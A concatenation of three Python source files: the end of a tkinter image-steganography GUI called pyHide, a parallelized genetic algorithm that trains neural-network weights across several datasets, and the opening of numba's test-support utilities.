self.frame, text="Encode", variable=self.radioOption, value='Encode', command=lambda: self.radioBtnCallback('Encode'))
self.radioEncode.grid(row=2, column=0)
self.radioDecode = ttk.Radiobutton(
self.frame, text="Decode", variable=self.radioOption, value='Decode', command=lambda: self.radioBtnCallback('Decode'))
self.radioDecode.grid(row=2, column=1, sticky=tk.W)
self.textArea = tk.Text(self.frame, height=30,
width=40, bg="black", fg="purple", insertbackground="purple")
self.textArea.config(state='normal')
self.textArea.grid(row=3, column=1, columnspan=1, rowspan=2,
sticky=tk.W+tk.E+tk.N+tk.S, pady=5)
# --------------------------------------------------------------------------------------------
# ascii banner
self.ascii_banner = pyfiglet.figlet_format('pyHide')
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
# --------------------------------------------------------------------------------------------
# progress bar
self.progressBar = ttk.Progressbar(
self.frame, orient="horizontal", length=550, mode="indeterminate")
# --------------------------------------------------------------------------------------------
# cancel button
self.btnCancel = ttk.Button(self.frame, text="Exit", width=8,
command=lambda: sys.exit(1))
self.btnCancel.grid(row=6, column=2, sticky=tk.W, pady=10)
root.mainloop()
# --------------------------------------------------------------------------------------------
# Buttons callbacks functions
def imageSteg(self):
"""Encode/Decode operations on selected image"""
if self.btnOpImage['text'] == 'Encode':
# Encode message to the selected image
self.textArea.insert(tk.END, "\n[*]Encoding...")
self.subThread = threading.Thread(
target=lsbSteg.encodeImage, args=(self.imagePathEntry.get(),
self.textArea.get("1.0", tk.END).split('[*]Encoding...')[0].split('[*]Enter message:')[-1], self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
else:
# Decode message from the selected image
self.textArea.insert(tk.END, f"\n[*]Decoding {self.imagePath}")
self.subThread = threading.Thread(
target=lsbSteg.decodeImage, args=(self.imagePathEntry.get(), self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
# --------------------------------------------------------------------------------------------
def checkThread(self):
if (self.subThread.is_alive()):
self.root.after(100, self.checkThread)
return
else:
self.progressBar.stop()
self.progressBar.grid_remove()
# --------------------------------------------------------------------------------------------
def radioBtnCallback(self, text):
self.textArea.delete('1.0', tk.END)
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
if text == "Encode":
self.textArea.insert(tk.END, "\n[*]Enter message:")
if self.checkboxExport:
self.checkboxExport.grid_remove()
else:
self.exportOpt = tk.IntVar()
self.checkboxExport = ttk.Checkbutton(
self.frame, text="Export to file", variable=self.exportOpt)
self.checkboxExport.grid(row=2, column=2, sticky=tk.E)
self.btnOpImage = ttk.Button(self.frame, text=text, width=8,
command=lambda: self.imageSteg(), state="normal" if self.imagePath else "disabled")
self.btnOpImage.grid(row=1, column=2)
# --------------------------------------------------------------------------------------------
def selectImage(self):
"""Open an image from a directory"""
# Select the Imagename from a folder
tk.Tk().withdraw()
self.imagePath = filedialog.askopenfilename(title='Open Image')
self.imagePathEntry.delete(0, tk.END)
self.imagePathEntry.insert(tk.INSERT, self.imagePath)
# opens the image
img = Image.open(self.imagePath)
# resize the image and apply a high-quality down sampling filter
img = img.resize((200, 200), Image.ANTIALIAS)
# PhotoImage class is used to add image to widgets, icons etc
img = ImageTk.PhotoImage(img)
# create a label
self.panel = ttk.Label(self.frame, image=img)
# set the image as img
self.panel.image = img
self.panel.grid(row=3, column=0, padx=5)
try:
self.btnOpImage['state'] = 'normal'
except:
pass
# ============================================================================================
if __name__ == "__main__":
root = ThemedTk(background=True, theme="equilux")
pyHide(root)
# ============================================================================================
|
GAParallel.py | # this is the parallelized version of GA.py. Parallelized by Matteo Bjornsson, original code written by Nick Stone
################################################################################
import random
import Performance
from NeuralNetwork import NeuralNetwork
import DataUtility
import numpy as np
import copy
import multiprocessing
import traceback
class individual:
def __init__(self):
self.fitness = float('inf')
#How big should each chromosome be? My initial assumption is the number of feature vectors across the board
self.chromosome = [] # some numpy == weights
self.Size = 0
def InitChromie(self,Feature_Size):
#Loop through each index up until the number of features and just set it to 0
self.chromosome = [Feature_Size]
for i in range(len(self.chromosome)):
self.chromosome[i] = 0
self.chromosome = np.array(self.chromosome)
self.Size = Feature_Size
def setfit(self,fit):
self.fitness = fit
def getfit(self):
return self.fitness
def SetChromie(self,Chromos):
self.chromosome = Chromos
def SetSize(self,si):
self.Size = si
def getsize(self):
return self.Size
def getChromie(self):
return self.chromosome
def ReturnChromie(self):
return self.chromosome
def printChromie(self):
for i in self.chromosome:
print(i)
class GA:
#####################
# Initialize the population etc
####################
#
def __init__(self, hyperparameters:dict , Total_Weight:int ,NN):
self.maxGen = hyperparameters["maxGen"]
self.pop_size = hyperparameters["pop_size"]
self.mutation_rate = hyperparameters["mutation_rate"]
self.mutation_range = hyperparameters["mutation_range"]
self.crossover_rate = hyperparameters["crossover_rate"]
self.generation = 0
#SEt the size to be the number of features
self.Chromosome_Size = Total_Weight
#Take in a neural Network
self.nn = NN
self.globalfit = list()
#init general population
#On the creation of a genetic algorithm, we should create a series of random weights in a numpy array that can be fed into the neural network.
#Create an individual object and set the chromosome weight randomly for each of the individuals in the population (pop size)
self.population = list()
for i in range(self.pop_size):
#Create a new individual object
temp = individual()
#Set the array size
temp.SetSize(Total_Weight)
#Initialize an empty list of weights 0s
temp.InitChromie(Total_Weight)
#Now randomly generate values to start for each of these sizes
temp.SetChromie(self.GenerateWeights())
#Add the individual to the list of total population
self.population.append(temp)
# random weight values, weight matrix is numpy array, matches network architecture
# use similar weight init function as from NN
self.bestChromie = self.population[0]
#Generating the initial weights
def GenerateWeights(self):
# initialize weights randomly, close to 0
# generate the matrices that hold the input weights for each layer. Maybe return a list of matrices?
# will need 1 weight matrix for 0 hidden layers, 2 for 1 hidden layer, 3 for 2 hidden layer.
layer_nodes = - 1
layer_inputs = 1
weights = np.random.uniform(layer_nodes, layer_inputs,self.Chromosome_Size)
return weights
########################################
# Evaluate the fitness of an individual
########################################
def fitness(self,) -> float:
#Fitness Function will be Mean squared Error
for i in self.population:
fitscore = self.nn.fitness(i.getChromie())
i.setfit(fitscore)
########################################
# Evaluate the fitness of an individual
########################################
def pfitness(self,) -> float:
print("FITNESS")
#Fitness Function will be Mean squared Error
for i in self.population:
fitscore = self.nn.fitness(i.getChromie())
print(fitscore)
i.setfit(fitscore)
##################################
# pick a subset of POP based ranked selection
#####################################
def selection(self):
self.population = sorted(self.population, key=lambda individual: individual.fitness)
bestChromie = self.population[0]
self.globalfit.append(bestChromie.fitness)
if bestChromie.fitness < self.bestChromie.fitness:
self.bestChromie = bestChromie
pop = self.pop_size
# RANKED ROULETTE SELECTION
newPopulation = list()
Subset = int(pop / 2 )
Subset = Subset + 1
for j in range(Subset):
choice = random.random()
sum = 0
for i in range(pop):
sum += 2/pop * (pop - (i+1))/(pop - 1)
if sum > choice:
newPopulation.append(self.population[i])
break
self.population = newPopulation
####################################
# make new generation based on parent selection by swapping chromosomes
####################################
def crossover(self):
self.generation = self.generation + 1
NewPop = list()
#{01 12 23 34 }
#TODO: pick crossover mechanism (uniform?)
for i in range(len(self.population)-1):
NewChromoC1 = list()
NewChromoC2 = list()
Parent1 = self.population[i]
Parent2 = self.population[i+1]
Child1 = individual()
Child2 = individual()
Child1.InitChromie(Parent1.getsize())
Child2.InitChromie(Parent2.getsize())
for i in range(Parent1.getsize()):
score = random.random()
if score > self.crossover_rate:
bit = Parent1.getChromie()
bit = bit[i]
bit2 = Parent2.getChromie()
bit2 = bit2[i]
else:
bit = Parent2.getChromie()
bit = bit[i]
bit2 = Parent1.getChromie()
bit2 = bit2[i]
NewChromoC1.append(bit)
NewChromoC2.append(bit2)
NewChromoC1 = np.array(NewChromoC1)
NewChromoC2 = np.array(NewChromoC2)
Child1.SetChromie(NewChromoC1)
Child2.SetChromie(NewChromoC2)
NewPop.append(Child1)
NewPop.append(Child2)
self.population = NewPop
while(len(self.population) > self.pop_size):
Kill = random.randint(0,len(self.population))
self.population.remove(self.population[Kill])
self.mutate()
###################################
# introduce random change to each individual in the generation
###############################
def mutate(self):
for i in self.population:
perc = random.random()
if perc > self.mutation_rate:
continue
else:
bit = random.randint(0,len(i.getChromie())-1)
temp = i.getChromie()
temp[bit] = random.uniform(-self.mutation_range,self.mutation_range)
i.SetChromie(temp)
def driver(q, ds: str, data_package: list, regression: bool, perf: Performance, hidden_layers: list, hyper_params: dict, count: int, total_counter:int, total: int):
print("Job ", ds, count, "started")
try:
# init all test data values
test_data, test_labels, training_data, training_labels, output_size, input_size = data_package
layers = [input_size] + hidden_layers + [output_size]
# init neural network
nn = NeuralNetwork(input_size, hidden_layers, regression, output_size)
nn.set_input_data(training_data, training_labels)
total_weights = 0
for i in range(len(layers)-1):
total_weights += layers[i] * layers[i+1]
#self, hyperparameters:dict , Total_Weight:int ,NN
ga = GA(hyper_params,total_weights, nn)
# plt.ion
for gen in range(ga.maxGen):
ga.fitness()
ga.selection()
ga.crossover()
# get best overall solution and set the NN weights
bestSolution = ga.bestChromie.getChromie()
bestWeights = ga.nn.weight_transform(bestSolution)
ga.nn.weights = bestWeights
# pass the test data through the trained NN
results = classify(test_data, test_labels, regression, ga, perf)
# headers = ["Data set", "layers", "pop", "Beta", "CR", "generations", "loss1", "loss2"]
Meta = [
ds,
len(hidden_layers),
hyper_params["maxGen"],
hyper_params["pop_size"],
hyper_params["mutation_rate"],
hyper_params["mutation_range"],
hyper_params["crossover_rate"]
]
results_performance = perf.LossFunctionPerformance(regression, results)
data_point = Meta + results_performance
data_point_string = ','.join([str(x) for x in data_point])
# put the result on the multiprocessing queue
q.put(data_point_string)
print(f"{ds} {count}/{int(total/6)}. {total_counter}/{total}")
except Exception as e:
print('Caught exception in worker thread')
# This prints the type, value, and stack trace of the
# current exception being handled.
traceback.print_exc()
print()
raise e
def generate_data_package(fold: int, tenfolds: list, regression: bool, du: DataUtility):
test_data, test_labels = copy.deepcopy(tenfolds[fold])
remaining_data = [x[0] for i, x in enumerate(copy.deepcopy(tenfolds)) if i!=fold]
remaining_labels = [y[1] for i, y in enumerate(copy.deepcopy(tenfolds)) if i!=fold]
#Store off a set of the remaining dataset
training_data = np.concatenate(remaining_data, axis=1)
#Store the remaining data set labels
training_labels = np.concatenate(remaining_labels, axis=1)
if regression == True:
#The number of output nodes is 1
output_size = 1
#else it is a classification data set
else:
#Count the number of classes in the label data set
output_size = du.CountClasses(training_labels)
#Get the test data labels in one hot encoding
test_labels = du.ConvertLabels(test_labels, output_size)
#Get the Labels into a One hot encoding
training_labels = du.ConvertLabels(training_labels, output_size)
input_size = training_data.shape[0]
return [test_data, test_labels, training_data, training_labels, output_size, input_size]
def classify(test_data: np.ndarray, test_labels: np.ndarray, regression: bool, ga: GA, perf: Performance):
estimates = ga.nn.classify(test_data, test_labels)
if regression == False:
#Decode the One Hot encoding Value
estimates = ga.nn.PickLargest(estimates)
ground_truth = ga.nn.PickLargest(test_labels)
else:
estimates = estimates.tolist()
ground_truth = test_labels.tolist()[0]
estimates = estimates[0]
results = perf.ConvertResultsDataStructure(ground_truth, estimates)
return results
# this function takes the results from the queue that all async jobs write to, and
# writes the jobs to disk. This function is meant to be started as it's own process.
# param q is the multiprocess Manager queue object shared by all jobs.
def data_writer(q, filename):
while True:
with open(filename, 'a') as f:
data_string = q.get()
if data_string == 'kill':
f.write('\n')
break
f.write(data_string + '\n')
if __name__ == '__main__':
headers = ["Data set", "layers", "maxGen", "pop_size", "mutation_rate", "mutation_range", "crossover_rate", "loss1", "loss2"]
filename = 'GA_results.csv'
Per = Performance.Results()
Per.PipeToFile([], headers, filename)
data_sets = ["soybean", "glass","Cancer","forestfires", "machine", "abalone"]
regression_data_set = {
"soybean": False,
"Cancer": False,
"glass": False,
"forestfires": True,
"machine": True,
"abalone": True
}
categorical_attribute_indices = {
"soybean": [],
"Cancer": [],
"glass": [],
"forestfires": [],
"machine": [],
"abalone": []
}
tuned_0_hl = {
"soybean": {
"mutation_rate": .2,
"crossover_rate": .2,
"hidden_layer": []
},
"Cancer": {
"mutation_rate": .8,
"crossover_rate": .5,
"hidden_layer": []
},
"glass": {
"mutation_rate": .5,
"crossover_rate": .2,
"hidden_layer": []
},
"forestfires": {
"mutation_rate": .2,
"crossover_rate": .5,
"hidden_layer": []
},
"machine": {
"mutation_rate": .2,
"crossover_rate": .2,
"hidden_layer": []
},
"abalone": {
"mutation_rate": .5,
"crossover_rate": .5,
"hidden_layer": []
}
}
tuned_1_hl = {
"soybean": {
"mutation_rate": .2,
"crossover_rate": .2,
"hidden_layer": [7]
},
"Cancer": {
"mutation_rate": .5,
"crossover_rate": .2,
"hidden_layer": [4]
},
"glass": {
"mutation_rate": .2,
"crossover_rate": .2,
"hidden_layer": [8]
},
"forestfires": {
"mutation_rate": .5,
"crossover_rate": .2,
"hidden_layer": [8]
},
"machine": {
"mutation_rate": .5,
"crossover_rate": .2,
"hidden_layer": [4]
},
"abalone": {
"mutation_rate": .8,
"crossover_rate": .2,
"hidden_layer": [8]
}
}
tuned_2_hl = {
"soybean": {
"mutation_rate": .2,
"crossover_rate": .2,
"hidden_layer": [7,12]
},
"Cancer": {
"mutation_rate": .5,
"crossover_rate": .2,
"hidden_layer": [4,4]
},
"glass": {
"mutation_rate": .5,
"crossover_rate": .5,
"hidden_layer": [8,6]
},
"forestfires": {
"mutation_rate": .2,
"crossover_rate": .5,
"hidden_layer": [8,8]
},
"machine": {
"mutation_rate": .5,
"crossover_rate": .5,
"hidden_layer": [7,2]
},
"abalone": {
"mutation_rate": .2,
"crossover_rate": .2,
"hidden_layer": [6,8]
}
}
##############################################
# START MULTIPROCESS JOB POOL
##############################################
manager = multiprocessing.Manager()
q = manager.Queue()
writer = multiprocessing.Process(target=data_writer, args=(q,filename))
writer.start()
pool = multiprocessing.Pool()
##############################################
du = DataUtility.DataUtility(categorical_attribute_indices, regression_data_set)
total_counter = 0
for data_set in data_sets:
if data_set != "abalone": continue
regression = regression_data_set[data_set]
tuned_parameters = [tuned_0_hl[data_set], tuned_1_hl[data_set], tuned_2_hl[data_set]]
data_set_counter = 0
# ten fold data and labels is a list of [data, labels] pairs, where
# data and labels are numpy arrays:
tenfold_data_and_labels = du.Dataset_and_Labels(data_set)
for j in range(10):
data_package = generate_data_package(fold=j, tenfolds=tenfold_data_and_labels, regression=regression, du=du)
for z in range(3):
if z != 2: continue
hidden_layers = tuned_parameters[z]["hidden_layer"]
# these are the parameters that were tuned:
############################################
# popss =[100] # paper suggests 10 * total weight
# bet = [.5,.8,.2] # note suggested from paper: [.5 , 1]
# cr = [.1, .3, .8] # note suggested from paper: cr from [0,.3], [.8, 1] if not converging
# maxgen = [500]
total_trials = 180
hyperparameters = {
"maxGen":500,
"pop_size":500,
"mutation_rate": tuned_parameters[z]["mutation_rate"],
"mutation_range": 10,
"crossover_rate": tuned_parameters[z]["crossover_rate"]
}
pool.apply_async(driver, args=(
q, # queue
data_set,
data_package,
regression,
Per,
hidden_layers,
hyperparameters,
data_set_counter,
total_counter,
total_trials
))
data_set_counter += 1
total_counter += 1
##############################
# CLOSE THE MULTIPROCESS POOL
##############################
pool.close()
pool.join()
q.put('kill')
writer.join()
|
support.py | """
Assorted utilities for use in tests.
"""
import cmath
import contextlib
import enum
import errno
import gc
import math
import platform
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
import warnings
import traceback
from contextlib import contextmanager
import numpy as np
from numba import testing
from numba.core import errors, typing, utils, config, cpu
from numba.core.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
import unittest
from numba.core.runtime import rtsys
from numba.np import numpy_support
try:
import scipy
except ImportError:
scipy = None
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_32bit = sys.maxsize <= 2 ** 32
is_parfors_unsupported = _32bit
skip_parfors_unsupported = unittest.skipIf(
is_parfors_unsupported,
'parfors not supported',
)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
skip_tryexcept_unsupported = unittest.skipIf(
utils.PYVERSION < (3, 7),
"try-except unsupported on py3.6 or earlier"
)
skip_tryexcept_supported = unittest.skipIf(
utils.PYVERSION >= (3, 7),
"try-except supported on py3.7 or later"
)
_msg = "SciPy needed for test"
skip_unless_scipy = unittest.skipIf(scipy is None, _msg)
_lnx_reason = 'linux only test'
linux_only = unittest.skipIf(not sys.platform.startswith('linux'), _lnx_reason)
_is_armv7l = platform.machine() == 'armv7l'
disabled_test = unittest.skipIf(True, 'Test disabled')
# See issue #4026, PPC64LE LLVM bug
skip_ppc64le_issue4026 = unittest.skipIf(platform.machine() == 'ppc64le',
("Hits: 'LLVM Invalid PPC CTR Loop! "
"UNREACHABLE executed' bug"))
try:
import scipy.linalg.cython_lapack
has_lapack = True
except ImportError:
has_lapack = False
needs_lapack = unittest.skipUnless(has_lapack,
"LAPACK needs SciPy 1.0+")
try:
import scipy.linalg.cython_blas
has_blas = True
except ImportError:
has_blas = False
needs_blas = unittest.skipUnless(has_blas, "BLAS needs SciPy 1.0+")
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.core.registry import cpu_target
cache_key = (func, args, return_type, flags)
if cache_key in self.cr_cache:
cr = self.cr_cache[cache_key]
else:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(bytes, np.bytes_)]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.numpy_version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if utils.PYVERSION >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
